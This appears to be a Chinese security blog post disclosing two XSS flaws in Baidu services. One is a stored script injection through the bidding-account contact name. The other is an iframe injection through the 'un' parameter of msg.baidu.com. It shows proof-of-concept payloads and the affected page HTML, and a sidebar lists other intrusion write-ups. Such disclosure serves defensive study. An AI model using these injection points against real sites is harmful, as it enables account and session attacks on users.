|
XSS 11: 百度竞价排名联系人Stored XSS
登录竞价排名后,修改个人设定,将联系人姓名改为:
| 以下是引用片段: <script>alert();</script> |
保存
然后在登录首页,将执行脚本
代码如下:
这是一个持久类型的XSS,也就是说,会存储在服务器端。
以下是引用片段:
<table border=0 cellpadding=0 cellspacing=0 width=800>
<tr><td colspan=3><h3 align=center><br>欢迎访问百度竞价排名客户管理系统</h3>
</td></tr></table>
<table align=center width=800 class=h4_center>
<tr><td height=30 align=center>尊敬的用户 <script>alert(/联系人姓名/);</script>XSShere,您好!
<input type=”hidden” name=”servermode” id=”servermode” value=”">
昨天,在幻影的邮件列表里,有一个叫royalwhy的朋友,在回复我的邮件里,也发了一个他发现的XSS。
经过他的同意后,我将其也贴在这里。
XSS 12:百度发送消息XSS (发现者:royalwhy)
漏洞如下:
以下是引用片段:
http://msg.baidu.com/ms?ct=21&cm=1&tn=bmSendMessage&un=<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>
un参数后可以执行任意脚本,代码如下:
| 以下是引用片段: <form name=”f” method=post action=”http://msg.baidu.com/” autocomplete = “off”> <input type=hidden name=ct value=”22″> <input type=hidden name=cm value=”MailSend”> <input type=hidden name=tn value=”bmspsubmit”> <input type=hidden name=lu value=”"> <input type=hidden name=vcode value=”"> <tr > <td align=”right”>发送至:</td> <td><input type=hidden name=sn value=”<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>”><iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/></td> </tr> |
这个系列写到这里,也没什么更大的动力再写下去了,我不喜欢做重复的劳动,所以明天将是最后一天,让我们结束这一切。而我也将有精力来阐述一些其他方面的问题和观点。
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |